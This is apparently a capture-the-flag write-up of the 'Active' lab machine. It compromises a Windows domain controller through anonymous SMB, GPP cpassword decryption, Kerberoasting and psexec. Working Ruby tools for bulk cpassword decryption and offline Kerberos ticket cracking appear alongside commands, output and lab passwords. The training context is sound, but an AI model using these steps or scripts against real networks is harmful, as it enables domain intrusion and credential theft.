Active
Nmap reveals that many ports are open:
nmap -sC -sV -oA nmap/ -T4 10.129.153.112
# Nmap 7.93 scan initiated Wed Jan 11 19:17:50 2023 as: /snap/nmap/2864/usr/bin/nmap -sC -sV -oA nmap/ -T4 10.129.210.76
Nmap scan report for 10.129.210.76
Host is up (0.060s latency).
Not shown: 983 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-01-11 17:17:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-01-11T17:18:53
|_ start_date: 2023-01-11T17:15:46
| smb2-security-mode:
| 210:
|_ Message signing enabled and required
Based on ports 53 (DNS), 88 (Kerberos) and 389/3268 (LDAP advertising the domain active.htb), plus the host name DC in the service info, we are dealing with Active Directory and almost certainly a domain controller! Let's start enumerating SMB with smbclient:
joonas@joonas-VirtualBox:~/Documents$ smbclient -L 10.129.210.76 -N
do_connect: Connection to 10.129.210.76 failed (Error NT_STATUS_HOST_UNREACHABLE)
joonas@joonas-VirtualBox:~/Documents$ smbclient -L 10.129.153.112 -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
Nice, anonymous login is allowed and we get a list of shares. We have no access to most of them, but Replication is readable anonymously. Let's check what's in there with smbclient:
smbclient \\\\10.129.153.112\\Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 13:37:44 2018
.. D 0 Sat Jul 21 13:37:44 2018
active.htb D 0 Sat Jul 21 13:37:44 2018
5217023 blocks of size 4096. 260059 blocks available
There seems to be one directory; let's download it to our local machine to inspect it more closely. Before we do that, turn prompt off (no per-file confirmation) and recurse on (mget descends into subdirectories), so the whole tree comes down with a single mget:
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
....
After downloading the files and looking through them, one file stands out: Groups.xml. It contains a username and an encrypted password in its cpassword attribute (encrypted, not hashed, which is exactly why it can be recovered):
Apparently this is/was a real thing on Windows according to this article. Group Policy Preferences let an admin set a local account's password through a GPO, and that password was written to Groups.xml under SYSVOL, AES-256 encrypted with a key Microsoft published in its own documentation. Every domain user can read SYSVOL, so anyone with a domain account (or, as here, anonymous access to a replica of it) can decrypt these values. Microsoft stopped GPOs from storing new passwords this way with MS14-025, but old Groups.xml files carrying a cpassword stay behind until someone cleans them up.
Anyway, let's decrypt the password. For this we use the following script (taken from here and modified slightly):
require 'openssl'
require 'base64'

# Decrypts a GPP cpassword: Base64 with the '=' padding stripped, AES-256-CBC under the key
# Microsoft published in its GPP documentation, an all-zero IV, and a UTF-16LE plaintext.
def decrypt(encrypted_data)
  padding = "=" * ((4 - (encrypted_data.length % 4)) % 4)
  epassword = "#{encrypted_data}#{padding}"
  decoded = Base64.decode64(epassword)
  key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
  aes = OpenSSL::Cipher.new("AES-256-CBC") # OpenSSL::Cipher::Cipher is the deprecated spelling
  aes.decrypt
  aes.key = key
  aes.iv = "\x00" * 16 # GPP uses an all-zero IV; set it explicitly instead of relying on the default
  plaintext = aes.update(decoded)
  plaintext << aes.final
  # The plaintext is UTF-16LE; convert it properly rather than with the 'v*'/'C*' trick, which breaks on characters above 0xFF
  plaintext.force_encoding("UTF-16LE").encode("UTF-8")
end

abort("usage: ruby gpp-decrypt.rb <cpassword>") if ARGV.empty?
puts decrypt(ARGV[0])
Save the script as gpp-decrypt.rb and run it with ruby, passing the cpassword value as the argument:
ruby gpp-decrypt.rb edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
And we get the password: 'GPPstillStandingStrong2k18'
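As an added example (not part of the original write-up), here is a small Ruby sweeper that does what the script above does, but across a whole downloaded Replication/SYSVOL tree: it finds every preference file that can carry a cpassword (Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml), decrypts each value with the published key and a zero IV, and reports which account it belongs to. It also carries the inverse (encryption) purely so a fixture can be built offline. The embedded Groups.xml is a constructed sample that reuses the cpassword and account name from this write-up; its attribute layout follows the real Groups.xml format, but the GUID attributes a real file carries are omitted. Function names and the directory argument are my own choices.

```ruby
require 'openssl'
require 'base64'

# The AES-256 key Microsoft published in the GPP documentation; it is the same on every domain.
GPP_AES_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*')
GPP_ZERO_IV = "\x00".b * 16

# Preference files that may carry a cpassword, and the attribute naming the account in each of them.
GPP_FILES = %w[Groups.xml Services.xml ScheduledTasks.xml DataSources.xml Drives.xml Printers.xml].freeze
ACCOUNT_ATTRS = %w[userName runAs accountName newName].freeze

def gpp_decrypt(cpassword)
  # SYSVOL stores the Base64 value with its '=' padding stripped; restore it before decoding.
  padded = cpassword + '=' * ((4 - cpassword.length % 4) % 4)
  aes = OpenSSL::Cipher.new('AES-256-CBC')
  aes.decrypt
  aes.key = GPP_AES_KEY
  aes.iv = GPP_ZERO_IV
  plain = aes.update(Base64.strict_decode64(padded)) + aes.final   # PKCS#7 padding is removed here
  # Plaintext is UTF-16LE. Defensively drop a trailing NUL so the value can be used as-is.
  plain.force_encoding('UTF-16LE').encode('UTF-8').sub(/\u0000+\z/, '')
end

# The inverse, only so a fixture can be built without a Windows box (an attacker never needs this).
def gpp_encrypt(password)
  aes = OpenSSL::Cipher.new('AES-256-CBC')
  aes.encrypt
  aes.key = GPP_AES_KEY
  aes.iv = GPP_ZERO_IV
  raw = aes.update(password.encode('UTF-16LE').b) + aes.final
  Base64.strict_encode64(raw).delete('=')
end

# Pull every <Properties ... cpassword="..."> out of one preference file. GPP XML is flat,
# attribute-only markup, so a regex is adequate here; attribute values are used raw (no entity decoding).
def find_cpasswords(xml_text)
  xml_text.scan(/<Properties\b([^>]*)>/).filter_map do |(attr_text)|
    attrs = attr_text.scan(/([\w:]+)="([^"]*)"/).to_h
    cpassword = attrs['cpassword']
    next if cpassword.nil? || cpassword.empty?       # MS14-025-era files leave the attribute empty
    account = ACCOUNT_ATTRS.map { |k| attrs[k] }.find { |v| v && !v.empty? }
    { account: account, cpassword: cpassword, password: gpp_decrypt(cpassword) }
  end
end

# Sweep a downloaded SYSVOL/Replication tree (what smbclient's recursive mget produced).
def scan_sysvol(root)
  Dir.glob(File.join(root, '**', '*.xml')).flat_map do |path|
    next [] unless GPP_FILES.include?(File.basename(path))
    find_cpasswords(File.read(path)).map { |hit| hit.merge(file: path) }
  end
end

# Constructed sample modelled on the Groups.xml layout, carrying the cpassword from this write-up.
SAMPLE_GROUPS_XML = <<~'XML'
  <?xml version="1.0" encoding="utf-8"?>
  <Groups>
    <User name="active.htb\SVC_TGS">
      <Properties action="U" newName="" fullName="" description=""
        cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
        changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
    </User>
  </Groups>
XML

if __FILE__ == $PROGRAM_NAME
  hits = ARGV.empty? ? find_cpasswords(SAMPLE_GROUPS_XML) : scan_sysvol(ARGV[0])
  hits.each { |h| puts "#{h[:file] || 'sample'}: #{h[:account]} => #{h[:password]}" }
end
```

Run it with no argument to decrypt the embedded sample, or with the directory mget created (`ruby gpp_sweep.rb active.htb`) to sweep everything under Policies. Services.xml and ScheduledTasks.xml matter as much as Groups.xml: the account a service or task runs as is often more privileged than a local user created through a GPO.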
These credentials don't get us far at first glance: psexec.py needs a writable share such as ADMIN$, which a plain domain user does not have. But any authenticated domain user can request a service ticket for any account that has an SPN, and that ticket is encrypted with a key derived from the service account's password, so let's try Kerberoasting using Impacket:
GetUserSPNs.py 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip 10.129.153.112 -request
And what do you know, the Administrator account has an SPN (active/CIFS:445), so we get a TGS for it that we can crack offline:
joonas@joonas-VirtualBox:~$ GetUserSPNs.py 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip 10.129.153.112 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 22:06:40.351723 2023-01-16 18:31:01.030538
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$9ec0ef6cd7f27876772b33bf18d13ff2$...
This is hashcat mode 13100 (Kerberos 5 TGS-REP etype 23, the RC4-HMAC ticket the $krb5tgs$23$ prefix announces). Store the hash in hash.txt and run:
.\hashcat.exe -m 13100 .\hash.txt .\rockyou.txt
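An added example, not from the original write-up nor from Impacket or hashcat, showing what the $krb5tgs$23$ line above actually contains and what hashcat does with each candidate from rockyou.txt. For RC4-HMAC (etype 23, RFC 4757) the ticket is encrypted under the service account's NT hash (MD4 of the UTF-16LE password): the cracker derives K1 = HMAC-MD5(NT, usage 2), K3 = HMAC-MD5(K1, checksum), RC4-decrypts the ticket body with K3 and accepts the candidate when HMAC-MD5(K1, body) equals the checksum. The code builds a ticket under the password the write-up recovered (the ticket body is a constructed placeholder, not real ASN.1, and the confounder is fixed so the output is reproducible), formats it the way GetUserSPNs.py does, and cracks it from a four-word list. MD4 and RC4 are implemented in plain Ruby because OpenSSL 3 ships both only in its legacy provider; the function names are mine.

```ruby
require 'openssl'

MASK32 = 0xffffffff
def rotl32(x, s); ((x << s) | (x >> (32 - s))) & MASK32; end

# MD4 (RFC 1320) in plain Ruby: the NT hash is MD4 over the UTF-16LE password, and OpenSSL 3
# offers MD4 only through its legacy provider, which a stock Ruby install does not load.
def md4(message)
  a, b, c, d = 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476
  data = message.b + "\x80".b
  data << "\x00".b while data.bytesize % 64 != 56
  data << [message.bytesize * 8].pack('Q<')                        # 64-bit little-endian bit length
  f = ->(u, v, w) { (u & v) | (~u & w) }
  g = ->(u, v, w) { (u & v) | (u & w) | (v & w) }
  h = ->(u, v, w) { u ^ v ^ w }
  rounds = [
    [f, 0x00000000, (0..15).to_a, [3, 7, 11, 19]],
    [g, 0x5a827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], [3, 5, 9, 13]],
    [h, 0x6ed9eba1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], [3, 9, 11, 15]]
  ]
  data.unpack('V*').each_slice(16) do |words|
    aa, bb, cc, dd = a, b, c, d
    rounds.each do |fn, k, order, shifts|
      order.each_with_index do |idx, i|
        a = rotl32((a + fn.call(b, c, d) + words[idx] + k) & MASK32, shifts[i % 4])
        a, b, c, d = d, a, b, c                                     # rotate the working registers
      end
    end
    a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
  end
  [a, b, c, d].pack('V4')
end

def nt_hash(password); md4(password.encode('UTF-16LE').b); end

# RC4 in plain Ruby, for the same reason as MD4.
def rc4(key, data)
  s = (0..255).to_a
  kb = key.bytes
  j = 0
  256.times do |i|
    j = (j + s[i] + kb[i % kb.size]) & 0xff
    s[i], s[j] = s[j], s[i]
  end
  i = j = 0
  data.each_byte.map do |byte|
    i = (i + 1) & 0xff
    j = (j + s[i]) & 0xff
    s[i], s[j] = s[j], s[i]
    byte ^ s[(s[i] + s[j]) & 0xff]
  end.pack('C*')
end

def hmac_md5(key, data); OpenSSL::HMAC.digest('MD5', key, data); end
KU_TGS_REP_TICKET = 2   # key usage number for a ticket's enc-part

# RFC 4757 RC4-HMAC: K1 = HMAC(K, usage), checksum = HMAC(K1, confounder||data),
# K3 = HMAC(K1, checksum), output = checksum || RC4(K3, confounder||data).
def rc4_hmac_encrypt(nt, plaintext, confounder, usage = KU_TGS_REP_TICKET)
  k1 = hmac_md5(nt, [usage].pack('V'))
  body = confounder + plaintext
  checksum = hmac_md5(k1, body)
  checksum + rc4(hmac_md5(k1, checksum), body)
end

# The per-candidate check a cracker performs: rebuild K3 from the checksum, decrypt, verify the HMAC.
def rc4_hmac_decrypt(nt, edata, usage = KU_TGS_REP_TICKET)
  k1 = hmac_md5(nt, [usage].pack('V'))
  checksum, ciphertext = edata[0, 16], edata[16..]
  body = rc4(hmac_md5(k1, checksum), ciphertext)
  hmac_md5(k1, body) == checksum ? body[8..] : nil                  # drop the 8-byte confounder
end

# hashcat 13100 layout as GetUserSPNs.py emits it: $krb5tgs$23$*user$realm$spn*$checksum$edata2
def format_krb5tgs(user, realm, spn, edata)
  "$krb5tgs$23$*#{user}$#{realm}$#{spn}*$#{edata[0, 16].unpack1('H*')}$#{edata[16..].unpack1('H*')}"
end

def parse_krb5tgs(line)
  m = line.match(/\A\$krb5tgs\$23\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$(\h{32})\$(\h+)\z/)
  raise ArgumentError, 'not an etype-23 $krb5tgs$ line' unless m
  { user: m[1], realm: m[2], spn: m[3], edata: [m[4] + m[5]].pack('H*') }
end

def crack_krb5tgs(line, wordlist)
  edata = parse_krb5tgs(line)[:edata]
  wordlist.find { |candidate| rc4_hmac_decrypt(nt_hash(candidate), edata) }
end

# Constructed sample: placeholder ticket body (not real ASN.1), fixed confounder, the write-up's password.
FAKE_TICKET_BODY = 'constructed EncTicketPart stand-in'.b
FIXED_CONFOUNDER = "\x01\x02\x03\x04\x05\x06\x07\x08".b
SAMPLE_LINE = format_krb5tgs('Administrator', 'ACTIVE.HTB', 'active/CIFS:445',
                             rc4_hmac_encrypt(nt_hash('Ticketmaster1968'), FAKE_TICKET_BODY, FIXED_CONFOUNDER))

puts SAMPLE_LINE
puts crack_krb5tgs(SAMPLE_LINE, %w[letmein Welcome1 Ticketmaster1968 hunter2]).inspect
```

Two things worth noticing: the whole verification per candidate is one MD4, three HMAC-MD5s and an RC4 pass, which is why etype 23 tickets crack so fast compared with AES ones (etype 17/18 use PBKDF2 with 4096 iterations per candidate), and nothing in the check involves the KDC, so the only thing a defender sees is the single TGS-REQ for the SPN. That is why the fix is a long random password on SPN-bearing accounts (or a gMSA) and disabling RC4 for them, not rate limiting.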
The password is 'Ticketmaster1968'. With these credentials we can login to the box via psexec:
psexec.py active.htb/administrator:Ticketmaster1968@10.129.153.112
And we are in! psexec.py installs and starts a service, so the shell runs as NT AUTHORITY\SYSTEM on the domain controller:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.129.153.112.....
[*] Found writable share ADMIN$
[*] Uploading file nppuIMaU.exe
[*] Opening SVCManager on 10.129.153.112.....
[*] Creating service Coao on 10.129.153.112.....
[*] Starting service Coao.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system